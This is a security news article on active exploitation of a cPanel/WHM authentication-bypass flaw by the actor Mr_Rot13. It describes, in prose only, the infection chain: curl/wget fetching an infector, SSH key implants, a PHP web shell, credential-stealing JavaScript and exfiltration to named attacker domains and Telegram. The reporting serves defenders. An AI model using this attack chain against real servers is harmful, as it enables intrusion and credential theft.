A critical security flaw affecting cPanel and WebHost Manager has been observed under active exploitation in global cyberattack campaigns, with threat actor Mr_Rot13 linked to the deployment of a newly identified backdoor named Filemanager. The vulnerability, tracked as CVE-2026-41940, enables authentication bypass and allows remote attackers to gain elevated access to server control panels, giving them the ability to manipulate hosting environments at a privileged level. Security researchers report that exploitation activity began shortly after public disclosure of the flaw, with attackers rapidly integrating it into automated attack chains targeting exposed systems worldwide.
According to analysis from QiAnXin XLab, the vulnerability is being exploited by multiple threat actors across different regions, leading to a range of malicious outcomes including cryptocurrency mining, ransomware deployment, botnet expansion, and persistent backdoor installation. Monitoring data indicates that more than 2000 attacker controlled IP addresses are currently participating in automated exploitation attempts. These sources are distributed globally, with significant activity originating from Germany, United States, Brazil, Netherlands and other regions. The widespread nature of the attacks highlights the rapid adoption of the vulnerability within cybercrime ecosystems, where exposed hosting control panels are being systematically targeted for initial access.
The attack chain involves a multi stage infection process that begins with shell scripts using wget or curl commands to retrieve a Go based infector from a remote server identified as cp.dene.de.com. Once executed, the infector implants a compromised SSH public key into the targeted cPanel environment, establishing persistent access for attackers. It also deploys a PHP based web shell capable of file upload, file download, and remote command execution, effectively granting full control over the compromised server. Following this, the web shell injects JavaScript code into hosted environments, serving a fake login interface designed to harvest credentials and transmit them to attacker controlled infrastructure encoded using ROT13 cipher, specifically routed to wrned.com. The attack chain ultimately results in deployment of a cross platform backdoor capable of operating across Windows, macOS, and Linux systems, significantly expanding the scope of compromise beyond traditional hosting environments.
Further technical examination shows that the infector is also designed to collect sensitive system data from compromised hosts, including bash history files, SSH credentials, device identifiers, database passwords, and cPanel virtual aliases. This data is then transmitted to a Telegram group managed by an operator identified as 0xWR, indicating centralized coordination of stolen information. In parallel, the Filemanager backdoor is delivered through a separate shell script hosted on wpsock.com, providing attackers with file management capabilities, remote command execution, and interactive shell access for continued exploitation of infected systems. Researchers also identified long term operational indicators suggesting that the actor behind this campaign, referred to as Mr_Rot13, has been active for several years, with infrastructure linked to the operation traced back to domains registered in 2020 and malicious components detected in samples dating as far back as 2022. Security telemetry further indicates that detection rates for related tooling and infrastructure have remained unusually low over a multi year period, suggesting sustained stealth operations within compromised environments.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
